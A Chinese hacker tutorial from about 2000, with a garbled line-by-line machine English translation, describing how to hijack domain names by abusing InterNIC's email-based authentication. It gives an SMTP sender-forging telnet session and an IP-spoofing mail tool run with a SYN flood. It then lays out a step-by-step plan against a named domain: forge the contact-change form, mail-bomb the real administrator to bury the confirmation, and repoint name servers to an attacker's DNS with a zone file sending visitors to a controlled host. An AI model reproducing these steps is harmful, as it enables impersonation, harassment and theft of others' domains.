利用InterNIC验证缺陷进行域名劫持 Verify defects using InterNIC domain name hijacking

by 1sn0 (isno@etang.com) by 1sn0 (isno@etang.com)

一、前言 I. Introduction

Internet域名是不安全的，很容易被人劫持，例如前些日子163.net被人劫持了，指向了其它的IP地址，当网民连接上去时还以为163.net被黑掉了。 Internet domain name is unsafe, it is easy to be abducted, such as 163.net was hijacked a few days ago, pointing to the other IP address, when users connect up had thought 163.net been compromised. 其实这并不是163.net的责任，而是因为国际域名提供商InterNIC在身份验证上存在缺陷造成的。 This is not the responsibility of 163.net, but because the international InterNIC domain name provider to authenticate the existence of the deficiencies.

二、InterNIC对用户请求进行身份验证的方法 Two, InterNIC to authenticate the user request methods

下面我们先来看看InterNIC进行身份验证的四种方法： Here we take a look at the four InterNIC authentication methods:

MAILFROM：最普遍的验证方法，通过在域名登记时填写的Administrator的EMAIL地址进行身份验证。 MAILFROM: The most common method of authentication, domain name registration completed by the Administrator of the EMAIL address for authentication.

CRYPT：请求可以来自任意EMAIL地址，但是需要一个标准的UNIX crypt()加密的密码。 CRYPT: EMAIL request can come from any address, but need a standard UNIX crypt () encrypted password. 这是在注册时指定的。 This is specified in the registration.

PGP：把域名注册者的PGP公匙放进InterNIC的数据库中，当发送请求时必须使用私匙进行数字签名。 PGP: the domain name registrant's PGP public key into the InterNIC database, when sending a request must be digitally signed using the private key.

FAX：用传真机把公司的信笺头或者公章传过去。 FAX: with the fax machine to the company's letterhead or official seal pass over head.

以上这些身份验证的方法都不是非常安全的，下面我们介绍对应的攻击方法。 These authentication methods are not very safe, here we introduce the corresponding attack.

三、相应的攻击方法 Third, the corresponding attack

1、 MAILFROM是最普遍的验证方法，对付它也最容易，一般就是利用伪造Administrator的EMAIL地址发出修改域名注册信息的MAIL，由于SENDMAIL不检查实际的发送者的EMAIL地址，所以我们可以非常轻松的伪造一封发自任意地址的信，当然这封信并没有完全被伪造，用如下方法： 1, MAILFROM is the most common authentication method, it is also the easiest to deal with, the general is the use of forged Administrator to issue change EMAIL address domain name registration information MAIL, SENDMAIL do not check as the actual sender's EMAIL address so we can be very easily forged a letter from the bottom of any address, of course, this letter does not completely false, use the following method:
telnet phunc.com 25 telnet phunc.com 25
Trying 209.249.172.58... Trying 209.249.172.58 ...
Connected to phunc.com (209.249.172.58). Connected to phunc.com (209.249.172.58).
Escape character is '^]'. Escape character is'^]'.
220 darkness.phunc.com ESMTP Sendmail 8.9.2/8.9.2; Wed, 17 Mar 1999 220 darkness.phunc.com ESMTP Sendmail 8.9.2/8.9.2; Wed, 17 Mar 1999
12:01:25 -0800 (PST) 12:01:25 -0800 (PST)
>> HELO phunc.com >> HELO phunc.com
250 darkness.phunc.com Hello phunc.wsmg.digex.net [207.87.17.101], 250 darkness.phunc.com Hello phunc.wsmg.digex.net [207.87.17.101],
pleased to meet you pleased to meet you
>> MAIL FROM:isno@etang.com #在这里就伪造了发送者的EMAIL地址 >> MAIL FROM: isno@etang.com # forged here on the EMAIL address of the sender
250 isno@etang.com... Sender ok 250 isno@etang.com ... Sender ok
>> RCPT TO:knight@phunc.com >> RCPT TO: knight@phunc.com
250 knight@phunc.com... Recipient ok 250 knight@phunc.com ... Recipient ok
>> DATA >> DATA
354 Enter mail, end with "." on a line by itself 354 Enter mail, end with "." On a line by itself
>> I am isno. >> I am isno.
>> -isno >>-Isno
>>isno@etang.com . >> Isno@etang.com.
250 MAA36653 Message accepted for delivery 250 MAA36653 Message accepted for delivery
QUIT QUIT
221 darkness.phunc.com closing connection 221 darkness.phunc.com closing connection
Connection closed by foreign host. Connection closed by foreign host.

当然，其实我们完全可以利用一些伪造信的软件来实现，我一般使用Kaboom!，凡是电子邮件炸弹都有这个功能。 Of course, in fact, we can use some of the counterfeit software to realize the letter, I generally use the Kaboom!, All e-mail bomb have this feature.

这样虽然伪造了发送者的EMAIL地址，但是还不是完全的伪造了，收信人可以查看邮件的原始信息来看到实际发送者的IP。 Although such a forged sender's EMAIL address, but is not completely false, and the recipient can view the original e-mail message to see the actual sender's IP. 例如，上面例子发出的伪造信在接受者看来是这样的： For example, the example given above, the recipient appears in the forged letter like this:
Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST) Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST)
From: isno@etang.com From: isno@etang.com
To: undisclosed-recipients: ; To: undisclosed-recipients:;

I am isno. I am isno.
-isno -Isno

但是如果收信人看一下原始信息，他会看到： However, if the recipient look at the original information, he will see:
Return-Path: Return-Path:
Received: from phunc.com (phunc.wsmg.digex.net [207.87.17.101]) Received: from phunc.com (phunc.wsmg.digex.net [207.87.17.101])
by darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653 by darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653
for knight@phunc.com; Wed, 17 Mar 1999 12:01:40 -0800 (PST) for knight@phunc.com; Wed, 17 Mar 1999 12:01:40 -0800 (PST)
(envelope-from bob@vila.com) (Envelope-from bob@vila.com)
Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST) Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST)
From: isno@etang.com From: isno@etang.com
Message-Id: <199903172001.MAA36653@darkness.phunc.com> Message-Id: <199903172001.MAA36653 @ darkness.phunc.com>
To: undisclosed-recipients:; To: undisclosed-recipients:;

I am isno. I am isno.
-isno -Isno


phunc.wsmg.digex.net就显示了发送者的实际地址。 phunc.wsmg.digex.net it shows the sender's actual address. 要完全伪造发送地址需要用到IP欺骗，有一种专门的程序可以实现，它是这样使用的： Need to be completely bogus sender address to use IP spoofing, there is a special program can be achieved, it is so used:

# spoofmail -f clinton@whitehouze.gov -h www.whitehouze.gov # Spoofmail-f clinton@whitehouze.gov-h www.whitehouze.gov
-t knight@phunc.com -m phunc.com -T knight@phunc.com-m phunc.com
Originator : clinton@whitehouze.gov Originator: clinton@whitehouze.gov
Fakehost : www.whitehouze.gov Fakehost: www.whitehouze.gov
Mail To : knight@phunc.com Mail To: knight@phunc.com
Mail Server: phunc.com Mail Server: phunc.com

Enter your message ending with a period on a line by itself: Enter your message ending with a period on a line by itself:
Hi knight. I am Bill, your president. I wanted to thank Hi knight. I am Bill, your president. I wanted to thank
you for your recent shipment of cigars. -Bill you for your recent shipment of cigars.-Bill
. .
Guessing SYN/ACK...108400. Guessing SYN/ACK...108400.
Synflooding www.whitehouze.gov... Synflooding www.whitehouze.gov ...
Connecting as www.whitehouze.gov to phunc.com. Connecting as www.whitehouze.gov to phunc.com.
Sending mail... Sent. Sending mail ... Sent.
Synflooding stopped. Connection closed. Synflooding stopped. Connection closed.
# #

这就伪造了一封发自克林顿的邮件，原始信息也看不出任何破绽： Clinton forged a letter from the bottom of this e-mail, the original information can not see any flaws:

Return-Path: Return-Path:
Received: from phunc.com (www.whitehouze.gov [209.81.9.231]) Received: from phunc.com (www.whitehouze.gov [209.81.9.231])
by darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653 by darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653
for knight@phunc.com; Wed, 17 Mar 1999 12:01:40 -0800 (PST) for knight@phunc.com; Wed, 17 Mar 1999 12:01:40 -0800 (PST)
(envelope-from clinton@whitehouze.gov) (Envelope-from clinton@whitehouze.gov)
Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST) Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST)
From: clinton@whitehouze.gov From: clinton@whitehouze.gov
Message-Id: <199903172001.MAA36653@darkness.phunc.com> Message-Id: <199903172001.MAA36653 @ darkness.phunc.com>
To: undisclosed-recipients:; To: undisclosed-recipients:;

Hi knight. I am Bill, your president. I wanted to thank Hi knight. I am Bill, your president. I wanted to thank
you for your recent shipment of cigars. -Bill you for your recent shipment of cigars.-Bill

咳……好象有点跑题了，应该说域名劫持，我怎么说成了伪造电子邮件了？ Cough ... seems a bit beside the point, it should be said domain name hijacking, how to say I became a forged e-mail? 其实用不着这么麻烦，只要用邮件炸弹简单的伪造一封邮件就可以骗过InterNIC了，具体实现方法的过程我会在后面详细的介绍。 In fact, do not need too much trouble, just use fake e-mail bombs simple message can fool InterNIC, the specific implementation process I described in detail later.

2、对付CRYPT加密的口令没有什么好方法，看来这种验证方法是比较安全的:-< 2 against CRYPT encrypted password is no good way, it appears that this method of authentication is more secure: - <

3、PGP签名的验证看起来很安全了吧？ 3, PGP signature verification seems to be safe, right? 可是InterNIC简直就是……。 But the InterNIC is simply ... .... 如果你发送一封伪造EMAIL地址的请求信件而不使用PGP签名给InterNIC，你猜会怎样？ EMAIL If you send a fake address instead of using the PGP signature request letter to the InterNIC, you guess what? InterNIC会拒绝你的请求吗？ InterNIC will reject your request? 哈哈，InterNIC完全忽视没有使用PGP签名的问题，而只是根据MAILFROM来鉴别认证，这不能不说是InterNIC的最大失误。 Haha, InterNIC does not completely ignore the issue using the PGP signature, but only to identify the certification according to MAILFROM to say that this is the InterNIC's biggest mistakes.

4、传真验证也很容易被利用，这需要一些社会工程学技巧，说白了就是骗人嘛！ 4, the fax is also very easy to use authentication, which requires some social engineering techniques, that the white lie it! 这里不打算讨论了，你自己琢磨去吧…… Do not intend to discuss here, you go on her own ... ...

四、利用伪造EMAIL地址进行域名劫持的具体步骤 Fourth, the use of forged domain name hijacking EMAIL address the specific steps

由于MAILFROM验证只是简单的查看管理员的邮件地址，所以很容易被利用，而且如前所述，PGP验证也可以利用MAILFROM的方法来进行攻击，下面就介绍利用伪造电子邮件来进行域名劫持的具体方法。 Verified simply because MAILFROM View administrator's email address, so it is easy to use, and mentioned above, PGP verification method can also be used MAILFROM to attack, following the introduction of the use of fake e-mail for specific domain name hijacking method.

所需工具： Tools required:

匿名邮件发送工具或邮件炸弹工具；一个浏览器，如IE；在任何免费邮件提供商的一个邮件帐号，如hotmail.com。 Anonymous e-mail or mail bomb sent tools tools; a browser such as IE; in any free e-mail provider, a mail account, such as hotmail.com.

在下面的例子中，我们假定要劫持的域名是wi2000.org，Let's go! In the following example, we assume that the domain name to be hijacked is wi2000.org, Let's go!

先通过浏览器连到networksolutions.com，点击“Who Is”按钮，输入要查询的域名，这里是wi2000.org，然后点“Search”。 First through a browser connected to the networksolutions.com, click on "Who Is" button, enter the domain name, here is wi2000.org, then "Search".

于是WHOIS会显示如下域名信息： So the domain name WHOIS will show the following information:

___________________________________________________________ ___________________________________________________________
Registrant: Registrant:
WI2000 (WI24-DOM) WI2000 (WI24-DOM)
Blixered 1 Blixered 1
Goteborg, Lila Edet 46394 Goteborg, Lila Edet 46394
SE SE

Domain Name: WI2000.ORG Domain Name: WI2000.ORG

Administrative Contact: Administrative Contact:
MICKE, ANDERSSON (AMM367) HACKEDINDUSTRIES@HOTMAIL.COM MICKE, ANDERSSON (AMM367) HACKEDINDUSTRIES@HOTMAIL.COM
545326-3445 (FAX) 545326-3445 545326-3445 (FAX) 545326-3445
Technical Contact, Zone Contact: Technical Contact, Zone Contact:
Jason, Berresford (BJE41) jasonb@MOUNTAINCABLE.NET Jason, Berresford (BJE41) jasonb@MOUNTAINCABLE.NET
1-(905)-765-5212 1- (905) -765-5212
Billing Contact: Billing Contact:
MICKE, ANDERSSON (AMM367) HACKEDINDUSTRIES@HOTMAIL.COM MICKE, ANDERSSON (AMM367) HACKEDINDUSTRIES@HOTMAIL.COM
545326-3445 (FAX) 545326-3445 545326-3445 (FAX) 545326-3445

Record last updated on 22-Jan-2000. Record last updated on 22-Jan-2000.
Record created on 19-Dec-1999. Record created on 19-Dec-1999.
Database last updated on 3-Feb-2000 14:29:53 EST. Database last updated on 3-Feb-2000 14:29:53 EST.

Domain servers in listed order: Domain servers in listed order:

NS1.CAN-HOST.COM 24.215.1.6 NS1.CAN-HOST.COM 24.215.1.6
NS2.MOUNTAINCABLE.NET 24.215.0.12 NS2.MOUNTAINCABLE.NET 24.215.0.12
____________________________________________________________ ____________________________________________________________

下面我们就通过改变管理员操作信息完全控制该域名。 Here we operate by changing the administrator complete control over the domain name information.

这种方法有一定的危险性，请慎重行事！ This approach has some risk, please be careful!

下面我们就可是正式的攻击，按照如下步骤进行： Here we can be a formal attack, according to the following steps:

- 连上http://www.networksolutions.com/； - Connect http://www.networksolutions.com/;

- 点击“Make Changes”； - Click "Make Changes";

- 输入域名wi2000.org； - Enter the domain name wi2000.org;

- 会出现两个按钮，点击其中的“Expert”； - There will be two buttons, click on the "Expert";

- 下一屏会出现标题“Select the form that meets your needs”； - The next screen will appear the title "Select the form that meets your needs";

- 点击“Contact Form”； - Click "Contact Form";

- 下面会出现有两个域的表单； - There are two fields will appear below the form;

- 在第一个域中填入管理员的操作名，在本例中wi2000.org的管理员是AMM367； - Fill in the first domain name administrator for operations, in this case wi2000.org administrator is AMM367;

- 在第二个域中填入管理员的EMAIL地址，本例中是HACKEDINDUSTRIES@HOTMAIL.COM； - In the second field enter the EMAIL address of the administrator, in this case is HACKEDINDUSTRIES@HOTMAIL.COM;

- 把选项改为“Modify”； - The option to "Modify";

- 现在点击“Proceed to Contact Information”； - Now click the "Proceed to Contact Information";

- 选择“MAIL-FROM”并点击“Go on to Contact Data Information”； - Select "MAIL-FROM" and click "Go on to Contact Data Information";

- 下面你应该可以看到这个域名的管理员的联系的全部信息； - Below you can see the domain name should contact the administrator of all the information;

- 在EMAIL地址域里把EMAIL改为你自己的假冒EMAIL地址，例如我把它改为dd@doom.com； - EMAIL address in the domain to your own fake EMAIL EMAIL address, for example, I changed it to dd@doom.com;

- 点击“Proceed to Set Authorization Scheme”； - Click "Proceed to Set Authorization Scheme";

- 再一次选择“MAIL-FROM”并填入管理员的EMAIL地址，这里是HACKEDINDUSTRIES@HOTMAIL.COM； - Once again, choose "MAIL-FROM" and fill in the administrator's EMAIL address, here is HACKEDINDUSTRIES@HOTMAIL.COM;

- 把底部的选项设为“No”和“Generate Contact Form”； - The bottom of the option set to "No" and "Generate Contact Form";

- 现在你应该看到一个所有信息的模板，大概是这个样子： - Now you should see a template for all the information about something like this:

_______________________________________________________________________ _______________________________________________________________________
******************* Please DO NOT REMOVE Version Number ********************** ******************* Please DO NOT REMOVE Version Number **********************

Contact Version Number: 1.0 Contact Version Number: 1.0

**************** Please see attached detailed instructions ******************* **************** Please see attached detailed instructions *******************

Authorization Authorization
0a. (N)ew (M)odify (D)elete.: Modify 0a. (N) ew (M) odify (D) elete.: Modify
0b. Auth Scheme.............: MAIL-FROM 0b. Auth Scheme .............: MAIL-FROM
0c. Auth Info...............: 0c. Auth Info ...............:

Contact Information Contact Information
1a. NIC Handle..............: AMM367 1a. NIC Handle ..............: AMM367
1b. (I)ndividual (R)ole.....: Individual 1b. (I) ndividual (R) ole .....: Individual
1c. Name....................: MICKE, ANDERSSON 1c. Name ....................: MICKE, ANDERSSON
1d. Organization Name.......: WI2000 1d. Organization Name .......: WI2000
1e. Street Address..........: BLIXERED 1 1e. Street Address ..........: BLIXERED 1
1f. City....................: GOTEBORG 1f. City ....................: GOTEBORG
1g. State...................: LILLA EDET 1g. State ...................: LILLA EDET
1h. Postal Code.............: 46394 1h. Postal Code .............: 46394
1i. Country.................: SE 1i. Country .................: SE
1j. Phone Number............: 545326-3445 1j. Phone Number ............: 545326-3445
1k. Fax Number..............: 545326-3445 1k. Fax Number ..............: 545326-3445
1l. E-Mailbox...............: dd@doom.com 1l. E-Mailbox ...............: dd@doom.com

Notify Information Notify Information
2a. Notify Updates..........: AFTER-UPDATE 2a. Notify Updates ..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE 2b. Notify Use ..............: AFTER-USE

Authentication Authentication
3a. Auth Scheme.............: MAIL-FROM 3a. Auth Scheme .............: MAIL-FROM
3b. Auth Info...............: HACKEDINDUSTRIES@HOTMAIL.COM 3b. Auth Info ...............: HACKEDINDUSTRIES@HOTMAIL.COM
3c. Public (Y/N)............: NO 3c. Public (Y / N )............: NO
______________________________________________________________________ ______________________________________________________________________

注意：这时千万不要点击底部的“Mail this contact form to me!”按钮，否则就前功尽弃了！ Note: At this time do not click on the bottom of the "Mail this contact form to me!" Button, otherwise come to naught!

下面把上面这些模板信息拷贝到你的匿名邮件发送软件或邮件炸弹上去，但是先不要发送！ The following information copy to the above template to your software or e-mail to send anonymous e-mail bomb up, but do not send! 下面是最复杂的部分了。 The following is the most complex part.

当你把这些信息寄到hostmaster@networksolutions.com，会有以下信息被发送到域名管理员的信箱里： When you send information hostmaster@networksolutions.com, the following information will be sent to the domain administrator's mailbox:

____________________________________ ____________________________________
Subject: [NIC-000128.4r50] Your Mail Subject: [NIC-000128.4r50] Your Mail
__________________________________________________________________________ __________________________________________________________________________
This is an automatic reply to acknowledge that your message has been This is an automatic reply to acknowledge that your message has been
received by hostmaster@networksolutions.com. This acknowledgement is "NOT" received by hostmaster@networksolutions.com. This acknowledgement is "NOT"
a confirmation that your request has been processed. You will be a confirmation that your request has been processed. You will be
notified when it has been completed. notified when it has been completed.

If you should have need to correspond with us regarding this request, If you should have need to correspond with us regarding this request,
please include the tracking number [NIC-000128.4r50] in the subject. please include the tracking number [NIC-000128.4r50] in the subject.
The easiest way to do this is simply to reply to this message. The easiest way to do this is simply to reply to this message.

If you have not already done so, please come and visit our site via www If you have not already done so, please come and visit our site via www
browser or ftp and pick-up the latest domain template or review the browser or ftp and pick-up the latest domain template or review the
Domain Name Registration Service Agreement at the URL's: Domain Name Registration Service Agreement at the URL's:

Domain Name Registration Service Agreement Domain Name Registration Service Agreement
http://www.networksolutions.com/legal/service-agreement.html http://www.networksolutions.com/legal/service-agreement.html
Domain Name Registration Template Domain Name Registration Template
ftp://www.networksolutions.com/templates/domain-template.txt ftp://www.networksolutions.com/templates/domain-template.txt

Regards, Regards,
Network Solutions Registration Services Network Solutions Registration Services

*********************************************** ***********************************************

*********************************************** ***********************************************
IMPORTANT INFORMATION IMPORTANT INFORMATION
*********************************************** ***********************************************
On January 15, 2000, Network Solutions introduced Service On January 15, 2000, Network Solutions introduced Service
Agreement, Version 6.0. All versions of the Service Agreement Agreement, Version 6.0. All versions of the Service Agreement
template will continue to be accepted and processed until template will continue to be accepted and processed until
January 31, 2000. On and after February 1, 2000, please use January 31, 2000. On and after February 1, 2000, please use
the Network Solutions Service Agreement, Version 6.0 template the Network Solutions Service Agreement, Version 6.0 template
located at located at
ftp://www.networksolutions.com/templates/domain-template.txt ftp://www.networksolutions.com/templates/domain-template.txt
for all template requests. for all template requests.

The terms and conditions of the Service Agreement are available The terms and conditions of the Service Agreement are available
on our Web site at on our Web site at
http://www.networksolutions.com/legal/service-agreement.html. http://www.networksolutions.com/legal/service-agreement.html.
************************************************ ************************************************

The zone files, which make the Internet work, are normally updated twice The zone files, which make the Internet work, are normally updated twice
daily, 7 days a week at 5:00 AM and 5:00 PM US Eastern Standard Time. daily, 7 days a week at 5:00 AM and 5:00 PM US Eastern Standard Time.
Requests that are completed before these times will be included in that Requests that are completed before these times will be included in that
12-hour zone file update and will normally begin to take effect within 12-hour zone file update and will normally begin to take effect within
5-6 hours. 5-6 hours.

Should you wish to modify or delete an existing domain name registration, Should you wish to modify or delete an existing domain name registration,
you can do so online, using our Service Agreement. You can change the you can do so online, using our Service Agreement. You can change the
registrant抯address, replace a contact/agent with a different registrant 抯 address, replace a contact / agent with a different
contact/agent, or change primary and/or secondary name server information. contact / agent, or change primary and / or secondary name server information.

To update information about an existing contact, such as postal address, To update information about an existing contact, such as postal address,
e-mail address or telephone number, complete and submit the Contact Form e-mail address or telephone number, complete and submit the Contact Form
to hostmaster@internic.net. This form is available on our Web site at to hostmaster@internic.net. This form is available on our Web site at
www.networksolutions.com www.networksolutions.com

To register or update information about a name server, complete and To register or update information about a name server, complete and
submit the Host Form to hostmaster@internic.net. This form is also submit the Host Form to hostmaster@internic.net. This form is also
available on our Web site. available on our Web site.

Network Solutions Registration Services Network Solutions Registration Services
e-mail: help@networksolutions.com e-mail: help@networksolutions.com
_______________________________________________________________________ _______________________________________________________________________

现在这些信息就会给我们的攻击带来麻烦，真正的管理员介绍到这封信就会发现我们的诡计了，但是我们仍然有办法。 Now this information will bring trouble to our attack, the real introduction to the administrator of this letter will find our trick, but we still have the means. 用你的邮件炸弹发送20~30封相似的邮件炸弹到该管理员的信箱，当他看到二三十封相似的信时，会以为这是某些人在用邮件炸弹开玩笑，一般就会把这些信都删除掉，这样一来我们就安全了。 Use your e-mail sent 20 to 30 bombs a similar message to the administrator of the mail bombs, when he saw two thirty similar letter when some people thought it was a joke with a mail bomb, the general will these letters are removed, so that we'll be safe.

即使他要回复这些信，一般也会弄错跟踪号码，这里的跟踪号码是[NIC-000128.4r50]。 Even if he wanted to reply to these letters, will usually wrong tracking number, where the tracking number is [NIC-000128.4r50]. 当然你用邮件炸弹炸他的时候不能使用真正的跟踪号，应该伪造几个不同的跟踪号码。 Of course, you use e-mail when a bomb he can not use real tracking number, should be forged several different tracking number. 下面是一些常见的跟踪号： Here are some common tracking number:

[NIC-000127.5089] [NIC-000127.5089]
[NIC-000128.4rg7] [NIC-000128.4rg7]
[NIC-000128.523f] [NIC-000128.523f]
[NIC-000127.53d0] [NIC-000127.53d0]
[NIC-000129.r609] [NIC-000129.r609]
[NIC-000128.3f6y] [NIC-000128.3f6y]
[NIC-000128.5d8t] [NIC-000128.5d8t]
[NIC-000127.r509] [NIC-000127.r509]
[NIC-000128.4r30] [NIC-000128.4r30]
[NIC-000127.d307] [NIC-000127.d307]
_____ _____

注意：不仅在标题处改变这些号码，在邮件当中也要改变。 Note: not only in the heading change these numbers, which have changed in the mail.

在本例中你应该假冒hostmaster@internic.net发送EMAIL信息到HACKEDINDUSTRIES@HOTMAIL.COM，信件标题和内容如前所述。 In this case you should send fake hostmaster@internic.net EMAIL message to HACKEDINDUSTRIES@HOTMAIL.COM, title and content of the letter mentioned above.

当你向他发送到10~15个信息时停止发送，下面我们伪装成 When you send him to 10 to 15 to stop sending messages, let's disguised as
HACKEDINDUSTRIES@HOTMAIL.COM向hostmaster@networksolutions.com发送伪造的回复信，内容如下所示： HACKEDINDUSTRIES@HOTMAIL.COM reply to hostmaster@networksolutions.com sent forged letters, the contents are as follows:

_______________________________________________________________________ _______________________________________________________________________
******************* Please DO NOT REMOVE Version Number ********************** ******************* Please DO NOT REMOVE Version Number **********************

Contact Version Number: 1.0 Contact Version Number: 1.0

**************** Please see attached detailed instructions ******************* **************** Please see attached detailed instructions *******************

Authorization Authorization
0a. (N)ew (M)odify (D)elete.: Modify 0a. (N) ew (M) odify (D) elete.: Modify
0b. Auth Scheme.............: MAIL-FROM 0b. Auth Scheme .............: MAIL-FROM
0c. Auth Info...............: 0c. Auth Info ...............:

Contact Information Contact Information
1a. NIC Handle..............: AMM367 1a. NIC Handle ..............: AMM367
1b. (I)ndividual (R)ole.....: Individual 1b. (I) ndividual (R) ole .....: Individual
1c. Name....................: MICKE, ANDERSSON 1c. Name ....................: MICKE, ANDERSSON
1d. Organization Name.......: WI2000 1d. Organization Name .......: WI2000
1e. Street Address..........: BLIXERED 1 1e. Street Address ..........: BLIXERED 1
1f. City....................: GOTEBORG 1f. City ....................: GOTEBORG
1g. State...................: LILLA EDET 1g. State ...................: LILLA EDET
1h. Postal Code.............: 46394 1h. Postal Code .............: 46394
1i. Country.................: SE 1i. Country .................: SE
1j. Phone Number............: 545326-3445 1j. Phone Number ............: 545326-3445
1k. Fax Number..............: 545326-3445 1k. Fax Number ..............: 545326-3445
1l. E-Mailbox...............: dd@doom.com 1l. E-Mailbox ...............: dd@doom.com

Notify Information Notify Information
2a. Notify Updates..........: AFTER-UPDATE 2a. Notify Updates ..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE 2b. Notify Use ..............: AFTER-USE

Authentication Authentication
3a. Auth Scheme.............: MAIL-FROM 3a. Auth Scheme .............: MAIL-FROM
3b. Auth Info...............: HACKEDINDUSTRIES@HOTMAIL.COM 3b. Auth Info ...............: HACKEDINDUSTRIES@HOTMAIL.COM
3c. Public (Y/N)............: NO 3c. Public (Y / N )............: NO
______________________________________________________________________ ______________________________________________________________________
_____ _____

注意：在邮件标题栏中不要填任何东西~~！ Note: Do not fill in the message title bar anything ~ ~!

然后发送这封邮件，只发一封，不要用邮件炸弹去炸hostmaster@networksolutions.com。 Then send this message only sent one, do not use e-mail bombs to blow hostmaster@networksolutions.com.

下面继续用邮件炸弹去炸HACKEDINDUSTRIES@HOTMAIL.COM，直到发送完30~35封不同跟踪号码的炸弹为止。 Let's continue with a mail bomb to blow HACKEDINDUSTRIES@HOTMAIL.COM, until sending 30 to 35 different tracking number until the bomb.

下面就是等待了，一般24小时以后你就成为wi2000.org这个域名的管理员了，然后就可以对这个域名为所欲为了。 Here is the waiting, usually 24 hours after you become wi2000.org this domain administrator, then you can do whatever they want on this domain.

例如我要把wi2000.org指向其它的IP地址，可以按照如下步骤： For example, I want wi2000.org point to another IP address, you can follow these steps:

- 打开浏览器，输入 - Open the browser, enter
http://www.networksolutions.com/cgi-bin/makechanges/change-registrar; http://www.networksolutions.com/cgi-bin/makechanges/change-registrar;

- 输入目标，如wi2000.org; - Enter the target, such as wi2000.org;

- 输入相关信息，写下Administrative 的email地址，现在是isno@etang.com; - Enter the relevant information, write Administrative email address is now isno@etang.com;

- 更改目标的dns服务器为你能控制的dns服务器，例如我已经控制了ns.some.com，就把dns服务器改为ns.some.com； - Change the target of the dns server dns server you can control, such as I have control of the ns.some.com, put the dns server to ns.some.com;

- 确认； - Confirmation;

- 过2、3分钟，在会收到一份registrar@netsol.com的信件，让你确认。 - Over 3 minutes, will receive a registrar@netsol.com in a letter for you to confirm.

- 确认之。 - Recognized.

这样wi2000.org的名字服务器就被换成了ns.some.com，然后我们就到ns.some.com上去修改Zone文件，想要找到Zone文件的位置可以先去/etc/named.boot中查看，在其中增加一条： This wi2000.org name server was replaced ns.some.com, and then we go on to ns.some.com Zone file changes, the location of the file you want to find the Zone you can go to / etc / named.boot view , in which added:

primary wi2000.org wi2000.hosts primary wi2000.org wi2000.hosts

找到directory "/var/named"这句，说明Zone文件放在/var/named文件下，在/var/named下建立一个wi2000.hosts文件，内容如下： Find the directory "/ var / named" phrase, indicating the Zone file in / var / named file, in / var / named under a wi2000.hosts file, as follows:

@ IN SOA ns.some.net. cf.pub.some.com. ( @ IN SOA ns.some.net. Cf.pub.some.com. (
1999111802 1999111802
10800 10800
3600 3600
604800 604800
86400 86400
) )
@ IN NS ns.some.com. @ IN NS ns.some.com.
www IN A 204.192.96.173 www IN A 204.192.96.173

204.192.96.173是另外一台被我们控制了的主机，然后在命令行上重新启动名字服务器： 204.192.96.173 is another one controlled by our host, and then on the command line to restart the name server:

#/etc/rc.d/init.d/named restart # / Etc / rc.d / init.d / named restart

注意：以上操作都假设ns.some.com的名字服务器是BIND。 Note: The above operations are assumed ns.some.com name server is BIND.

这样当有人通过浏览器连接www.wi2000.org时，他就会连向204.192.96.173， So that when someone connected www.wi2000.org through a browser, he will not even to 204.192.96.173,
因为204.192.96.173已经被我们控制，我们就可以随意修改它的主页，这样别人还以为www.wi2000.org被黑了！ Because 204.192.96.173 has been our control, we can modify it's home page, so people thought www.wi2000.org was hacked!

注意：以上这种方法只限于在InterNIC注册的管理员EMAIL和技术EMAIL不同时才有效。 Note: The above method is limited to registered administrators at the InterNIC and technical EMAIL EMAIL different when effective.



参考资料： References:

A guide to exploiting Network Solution's InterNIC.------knight (knight@phunc.com) A guide to exploiting Network Solution's InterNIC .------ knight (knight@phunc.com)

Domain Name Robbery (aka Domain-Jacking): A Flaw in InterNIC Authentication Scheme---------Lucifer Mirza (lucifermirza@hotmail.com) Domain Name Robbery (aka Domain-Jacking): A Flaw in InterNIC Authentication Scheme --------- Lucifer Mirza (lucifermirza@hotmail.com)


Contact me： Contact me:

e-mail: isno@etang.com e-mail: isno@etang.com
homepage: http://isno.yeah.net homepage: http://isno.yeah.net
irc: 202.96.137.64:6667 #darksun irc: 202.96.137.64:6667 # darksun

My PGP key: My PGP key:

-----BEGIN PGP PUBLIC KEY BLOCK----- ----- BEGIN PGP PUBLIC KEY BLOCK -----
Version: 2.6.3i Version: 2.6.3i

mQCNAzms8foAAAEEAKHdhUomcQ07xx//rfv40gJUU4aZMfQy/4NAc4UUUVv/ObM4 mQCNAzms8foAAAEEAKHdhUomcQ07xx / / rfv40gJUU4aZMfQy/4NAc4UUUVv/ObM4
pDYvbzPblEBIincbMwGKJZqosuk392F5hBZqt7aIGlvhnGzMDf8cIAQknIYvUn+H pDYvbzPblEBIincbMwGKJZqosuk392F5hBZqt7aIGlvhnGzMDf8cIAQknIYvUn + H
GCy0nOqLhFQusMxrSwMy33BTjMrqmwQr/ZjjfM8ObaOROeo1rCplpLS4wRQ9AAUR GCy0nOqLhFQusMxrSwMy33BTjMrqmwQr/ZjjfM8ObaOROeo1rCplpLS4wRQ9AAUR
tARpc25viQCVAwUQOazx+iplpLS4wRQ9AQHceAP8DzZzv/n1xFCZSm1Q9C29bSgf tARpc25viQCVAwUQOazx + iplpLS4wRQ9AQHceAP8DzZzv/n1xFCZSm1Q9C29bSgf
uRRX5qV8tufQMAL8KWnomo1I9kvnUUTvYwgn1uc5uHysbNERyHad3MY+a7k94IAx uRRX5qV8tufQMAL8KWnomo1I9kvnUUTvYwgn1uc5uHysbNERyHad3MY + a7k94IAx
dcX0CYlDnW8koNzGTO6TjdzfByzckb5dvp9fDH3PhjZ8trtN4z6jYQkG5MvPC80h dcX0CYlDnW8koNzGTO6TjdzfByzckb5dvp9fDH3PhjZ8trtN4z6jYQkG5MvPC80h
NxBrN0SwiJKIapj29gI= NxBrN0SwiJKIapj29gI =
=JP/1 = JP / 1
-----END PGP PUBLIC KEY BLOCK----- ----- END PGP PUBLIC KEY BLOCK -----

-EOF -EOF